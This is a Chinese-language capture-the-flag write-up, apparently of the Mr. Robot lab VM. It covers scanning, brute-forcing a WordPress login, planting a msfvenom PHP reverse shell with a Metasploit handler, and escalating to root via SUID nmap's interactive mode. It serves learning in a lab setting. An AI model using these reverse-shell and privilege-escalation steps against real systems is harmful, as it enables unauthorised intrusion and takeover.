信息收集
IP地址:arp-scan -l
192.168.47.165
端口服务: nmap -sV -A -p- 192.168.47.165 --open
都是常见端口,22是ssh服务,80是web服务,
443倒不太清楚(只是很多次看到) --- 哦对,HTTPS传输用的是这个端口,
没有什么特殊信息
**访问web服务,目录扫描:**页面很酷炫,
**1.**扫描到了一个 url/feed 目录 -> 一些xml格式的数据
-> 看到了wordpress的字眼 ,想起来用扩展工具看一眼网站架构 果然是通过wordpress搭建的
2. 扫描到了robots.txt,
一个flag吧好像(我没看原题简介,下载的时候好像说是三个flag,看样子像是第一个)
另外一个是字典文件 — 肯定是用来爆破的,加上之前确认的wordpress框架 -> 猜测是admin后台密码爆破
通过 wget http://192.168.47.165/fsocity.dic 下载下来
3. 扫到了wp-admin目录 -> 果然,wordpress后台页面
接下来就是用wpscan扫描一下用户名(我直接就认为那个是密码的字典了),
wpscan --url http://192.168.47.165 --enumerate
-> 并没有扫到用户名
我一下子就不会了,去看了wp,说是账号密码都用这个字典,对啊,这都没想到
但是,这都用一个字典,我了个,真多,时间太长了
真不能等了,看wp了
用户名:elliot
密码:ER28-0652
OK了,成功登录进来了
漏洞
在这里的编辑模块插入反弹shell的代码,通过msf连接
通过以下命令生成payload
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.47.135 lport=6666 -f raw >/root/shell.php
插入上面的代码,然后在终端运行以下代码,接着访问php页面,从而反弹shell
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.47.135
set lport 6666
run
有一点就是路径的问题(我的看wp,或许因为是wp框架吧,所以能够猜出来)
提权
首先看有几个用户,sudo -l看一下啊
查找一下suid权限的命令
find / -user root -perm -4000 -print 2>/dev/null
但是当前用户下没有执行nmap的权限,
去/home目录下,还有一个robot用户,且该用户的路径下存在一个flag,另外一个文件是密码的哈希值,破解得到
abcdefghijklmnopqrstuvwxyz,我自己没得到,看的wp
然后切换到robot用户下,可以执行nmap命令
总结
msf的一些使用
nmap提权,交互模式下
nmap在2.02--5.21版本中都带有交互模式,允许用户执行shell命令
nmap --interactive #进入到nmap的交互模式
!# # 获取shell
参考
https://www.cnblogs.com/PANDA-Mosen/p/13199080.html
nmap --interactive #进入到nmap的交互模式
!# # 获取shell
#### 参考
https://www.cnblogs.com/PANDA-Mosen/p/13199080.html
https://developer.aliyun.com/article/1362867?spm=5176.26934562.main.4.3e234ed5C2y5M1
扫一扫
206
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
